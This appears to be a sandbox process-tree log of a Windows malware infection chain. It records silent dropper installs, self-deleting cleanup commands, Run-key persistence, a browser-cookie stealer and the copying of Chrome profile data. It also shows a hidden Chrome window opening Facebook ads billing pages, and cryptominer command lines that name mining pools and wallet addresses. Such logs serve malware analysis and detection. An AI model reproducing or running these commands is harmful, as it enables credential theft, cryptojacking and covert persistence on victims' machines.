C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:6072
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://leatherclothesone.xyz/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703917⤵PID:7444
C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe"C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe" /ustwo INSTALL15⤵PID:7144
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "savt15kynqx.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zzcfyqu1k30\savt15kynqx.exe" & exit16⤵PID:4752
C:\Windows\SysWOW64\taskkill.exetaskkill /im "savt15kynqx.exe" /f17⤵
- Kills process with taskkill
PID:2356
C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe"C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe" ll12⤵
- Executes dropped EXE
PID:6424 -
C:\Users\Admin\AppData\Local\Temp\is-UJ7S4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UJ7S4.tmp\setups.tmp" /SL5="$20558,1873631,71168,C:\Users\Admin\AppData\Local\Temp\YXW8K3U1RS\setups.exe" ll13⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2804
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\guihuali-game.exe"11⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6492 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:7012
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6792
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"11⤵
- Executes dropped EXE
PID:6508 -
C:\Users\Admin\AppData\Local\Temp\is-UUUBH.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-UUUBH.tmp\LabPicV3.tmp" /SL5="$1055A,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6652 -
C:\Users\Admin\AppData\Local\Temp\is-0FMS1.tmp\alpATCHInO.exe"C:\Users\Admin\AppData\Local\Temp\is-0FMS1.tmp\alpATCHInO.exe" /S /UID=lab21413⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:5820 -
C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe"C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:6636 -
C:\Users\Admin\AppData\Local\Temp\is-F8FI6.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-F8FI6.tmp\prolab.tmp" /SL5="$20570,575243,216576,C:\Program Files\Windows Security\RIFLFFLLTS\prolab.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5312
C:\Users\Admin\AppData\Local\Temp\b8-2e6c7-8fb-5a6b1-d41558dfc22e2\Geqymilace.exe"C:\Users\Admin\AppData\Local\Temp\b8-2e6c7-8fb-5a6b1-d41558dfc22e2\Geqymilace.exe"14⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5180 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 207615⤵
- Executes dropped EXE
PID:6608
C:\Users\Admin\AppData\Local\Temp\67-9314c-05b-4e0bc-6835297b908c2\Lyjylokulae.exe"C:\Users\Admin\AppData\Local\Temp\67-9314c-05b-4e0bc-6835297b908c2\Lyjylokulae.exe"14⤵
- Executes dropped EXE
PID:4800 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exe & exit15⤵PID:8152
C:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exeC:\Users\Admin\AppData\Local\Temp\ulfdyby5.kj4\gaooo.exe16⤵PID:7884
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7688
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:2240
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exe & exit15⤵PID:7632
C:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exeC:\Users\Admin\AppData\Local\Temp\soh4zf1o.1ws\google-game.exe16⤵
- Suspicious use of SetWindowsHookEx
PID:6928 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:7772
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exe & exit15⤵PID:8176
C:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\pyihuqlj.goc\jg8_8qyu.exe16⤵
- Checks whether UAC is enabled
PID:4908
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe & exit15⤵PID:1748
C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe16⤵PID:7440
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\qj50gpen.n0g\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:5692
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:1116
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:7064
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exe & exit15⤵PID:7324
C:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\wjvhb4pb.hca\askinstall31.exe16⤵PID:7828
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\te05nyxn.1zk\GcleanerWW.exe /mixone & exit15⤵PID:3912
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exe & exit15⤵PID:8880
C:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jh4ywuys.idy\setup_10.2_mix.exe16⤵PID:8984
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exe & exit15⤵PID:9068
C:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exeC:\Users\Admin\AppData\Local\Temp\blvqv4rs.k2w\file_1.exe16⤵PID:9116
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"17⤵PID:8956
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
PID:8448 -
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 1 3.1617987891.6070893357afd 10119⤵
- Adds Run key to start application
PID:4872 -
C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\Y16O0ASUE9\multitimer.exe" 2 3.1617987891.6070893357afd20⤵
- Checks for any installed AV software in registry
PID:8416 -
C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe" /Verysilent /subid=57721⤵PID:9664
C:\Users\Admin\AppData\Local\Temp\is-NVP6S.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-NVP6S.tmp\Setup3310.tmp" /SL5="$409FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\ftjirtqktp3\Setup3310.exe" /Verysilent /subid=57722⤵PID:9760
C:\Users\Admin\AppData\Local\Temp\is-L73EC.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L73EC.tmp\Setup.exe" /Verysilent23⤵PID:8548
C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe"C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe" /ustwo INSTALL21⤵PID:9804
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "hkqir3xr5e5.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ljjeaaxn1xw\hkqir3xr5e5.exe" & exit22⤵PID:9480
C:\Windows\SysWOW64\taskkill.exetaskkill /im "hkqir3xr5e5.exe" /f23⤵
- Kills process with taskkill
PID:9736
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe" /8-2321⤵PID:9868
C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe"C:\Users\Admin\AppData\Local\Temp\01nzhrgdcae\app.exe" /8-2322⤵
- Modifies data under HKEY_USERS
PID:6640
C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe"C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe" ll18⤵PID:8828
C:\Users\Admin\AppData\Local\Temp\is-FPBPB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-FPBPB.tmp\setups.tmp" /SL5="$10968,1873631,71168,C:\Users\Admin\AppData\Local\Temp\PHSX33JHN2\setups.exe" ll19⤵
- Checks computer location settings
PID:8948
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Version.exe"17⤵
- Suspicious use of SetWindowsHookEx
PID:8372 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install18⤵PID:4068
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"17⤵PID:6128
C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"18⤵
- Suspicious use of SetThreadContext
PID:7696 -
C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"C:\Users\Admin\AppData\Roaming\7BEF.tmp.exe"19⤵
- Checks whether UAC is enabled
- Checks processor information in registry
PID:8544
C:\Users\Admin\AppData\Roaming\7FA9.tmp.exe"C:\Users\Admin\AppData\Roaming\7FA9.tmp.exe"18⤵PID:8024
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23611 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:9252
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w32756@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:9556
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"18⤵PID:8336
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:6408
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"17⤵PID:8852
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8852 -s 462018⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6652
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exe & exit15⤵PID:9192
C:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exeC:\Users\Admin\AppData\Local\Temp\2wluykhq.mlb\6762a766.exe16⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious behavior: MapViewOfSection
PID:6584
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe /8-2222 & exit15⤵PID:8952
C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exeC:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe /8-222216⤵PID:7268
C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe"C:\Users\Admin\AppData\Local\Temp\eddgqexk.rw1\app.exe" /8-222217⤵
- Modifies data under HKEY_USERS
PID:9672
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
PID:6484
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"11⤵PID:6608
C:\Users\Admin\AppData\Local\Temp\is-0OK41.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-0OK41.tmp\lylal220.tmp" /SL5="$1055E,298214,214528,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\lylal220.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6708
C:\Users\Admin\AppData\Local\Temp\is-LV91D.tmp\ysAGEL.exe"C:\Users\Admin\AppData\Local\Temp\is-LV91D.tmp\ysAGEL.exe" /S /UID=lylal22013⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:7140
C:\Program Files\Common Files\UJCHJUYILS\irecord.exe"C:\Program Files\Common Files\UJCHJUYILS\irecord.exe" /VERYSILENT14⤵
- Executes dropped EXE
PID:5052
C:\Users\Admin\AppData\Local\Temp\is-5SE7S.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-5SE7S.tmp\irecord.tmp" /SL5="$1058A,5922518,66560,C:\Program Files\Common Files\UJCHJUYILS\irecord.exe" /VERYSILENT15⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6532
C:\Program Files (x86)\i-record\i-record.exe"C:\Program Files (x86)\i-record\i-record.exe" -silent -desktopShortcut -programMenu16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6936
C:\Users\Admin\AppData\Local\Temp\fe-bd7e5-d1a-514af-929c0da9e6ecc\Naebuvulaene.exe"C:\Users\Admin\AppData\Local\Temp\fe-bd7e5-d1a-514af-929c0da9e6ecc\Naebuvulaene.exe"14⤵
- Executes dropped EXE
PID:5580
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 220015⤵PID:7232
C:\Users\Admin\AppData\Local\Temp\8d-fd1b5-93a-0a7a0-4cfe0c0b94481\Gaesojahure.exe"C:\Users\Admin\AppData\Local\Temp\8d-fd1b5-93a-0a7a0-4cfe0c0b94481\Gaesojahure.exe"14⤵
- Executes dropped EXE
PID:5264
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exe & exit15⤵PID:7988
C:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exeC:\Users\Admin\AppData\Local\Temp\egywegys.mku\gaooo.exe16⤵
- Executes dropped EXE
PID:6232
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7844
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5384
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exe & exit15⤵
- Executes dropped EXE
PID:5220
C:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exeC:\Users\Admin\AppData\Local\Temp\hc1qgarn.4f4\google-game.exe16⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:8068
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install17⤵PID:2612
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exe & exit15⤵PID:3916
C:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exeC:\Users\Admin\AppData\Local\Temp\ohayitxd.f02\jg8_8qyu.exe16⤵PID:8044
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe & exit15⤵PID:4428
C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exeC:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe16⤵
- Checks processor information in registry
PID:8008
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im wwfvd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\ptkgjbht.d4q\wwfvd.exe" & del C:\ProgramData\*.dll & exit17⤵PID:4456
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV118⤵PID:2240
C:\Windows\SysWOW64\taskkill.exetaskkill /im wwfvd.exe /f18⤵
- Kills process with taskkill
PID:4804
C:\Windows\SysWOW64\timeout.exetimeout /t 618⤵
- Delays execution with timeout.exe
PID:6012
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exe & exit15⤵PID:7420
C:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\11sujvrn.21v\askinstall31.exe16⤵PID:6368
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵PID:6136
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
PID:7360
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y17⤵
- Enumerates system info in registry
PID:5068
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/17⤵PID:7772
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff909f96e00,0x7ff909f96e10,0x7ff909f96e2018⤵PID:8104
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,12176870085335734753,3984848402317032022,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1616 /prefetch:818⤵PID:1628
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tt2vtewb.vwx\GcleanerWW.exe /mixone & exit15⤵PID:6460
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exe & exit15⤵PID:9912
C:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\jqil3ztf.lhj\setup_10.2_mix.exe16⤵
- Drops file in Program Files directory
PID:9892
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exe & exit15⤵PID:8836
C:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exeC:\Users\Admin\AppData\Local\Temp\cdic0cse.13k\file_1.exe16⤵PID:2904
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Setup.exe"17⤵PID:9144
C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
- Drops file in Windows directory
PID:5660
C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 1 3.1617987939.60708963c6c65 10119⤵
- Adds Run key to start application
PID:1972
C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\069BJF9LQ6\multitimer.exe" 2 3.1617987939.60708963c6c6520⤵
- Checks for any installed AV software in registry
PID:1172
C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe"C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe" /8-2321⤵PID:5812
C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe"C:\Users\Admin\AppData\Local\Temp\utmear3fvp0\app.exe" /8-2322⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:8024
C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe" /Verysilent /subid=57721⤵PID:8980
C:\Users\Admin\AppData\Local\Temp\is-5A3IJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5A3IJ.tmp\Setup3310.tmp" /SL5="$60352,138429,56832,C:\Users\Admin\AppData\Local\Temp\p25yplus3vm\Setup3310.exe" /Verysilent /subid=57722⤵PID:9400
C:\Users\Admin\AppData\Local\Temp\is-QBMO4.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-QBMO4.tmp\Setup.exe" /Verysilent23⤵PID:3748
C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe"C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe" /ustwo INSTALL21⤵PID:6436
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "eljstfm03u2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\xk2rdazcupr\eljstfm03u2.exe" & exit22⤵PID:10544
C:\Windows\SysWOW64\taskkill.exetaskkill /im "eljstfm03u2.exe" /f23⤵
- Kills process with taskkill
PID:10688
C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe"C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe" ll18⤵PID:7776
C:\Users\Admin\AppData\Local\Temp\is-M0SIO.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-M0SIO.tmp\setups.tmp" /SL5="$40B58,1873631,71168,C:\Users\Admin\AppData\Local\Temp\KBVI2ZD9PL\setups.exe" ll19⤵
- Checks computer location settings
PID:4740
C:\Users\Admin\AppData\Local\Temp\RarSFX5\Full Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\Full Version.exe"17⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5440
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install18⤵
- Blocklisted process makes network request
PID:6752
C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"17⤵
- Modifies data under HKEY_USERS
PID:1244
C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"18⤵
- Suspicious use of SetThreadContext
PID:5896
C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"C:\Users\Admin\AppData\Roaming\2BB7.tmp.exe"19⤵
- Checks processor information in registry
PID:10072
C:\Users\Admin\AppData\Roaming\2DDB.tmp.exe"C:\Users\Admin\AppData\Roaming\2DDB.tmp.exe"18⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5864
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w23758 --cpu-max-threads-hint 50 -r 999919⤵
- Blocklisted process makes network request
PID:9028
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:9480
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w24915@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:6072
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX5\file.exe"18⤵PID:4772
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
PID:4604
C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\md2_2efs.exe"17⤵
- Checks whether UAC is enabled
PID:4992
C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\BTRSetp.exe"17⤵PID:8148
C:\ProgramData\2232435.exe"C:\ProgramData\2232435.exe"18⤵PID:8200
C:\ProgramData\4458909.exe"C:\ProgramData\4458909.exe"18⤵
- Suspicious behavior: SetClipboardViewer
PID:8516
C:\ProgramData\4586372.exe"C:\ProgramData\4586372.exe"18⤵PID:10852
C:\ProgramData\5685111.exe"C:\ProgramData\5685111.exe"18⤵PID:10080
C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\gcttt.exe"17⤵PID:8824
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:4256
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt18⤵PID:10144
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exe & exit15⤵PID:8980
C:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exeC:\Users\Admin\AppData\Local\Temp\zj14kjvn.jtx\6762a766.exe16⤵
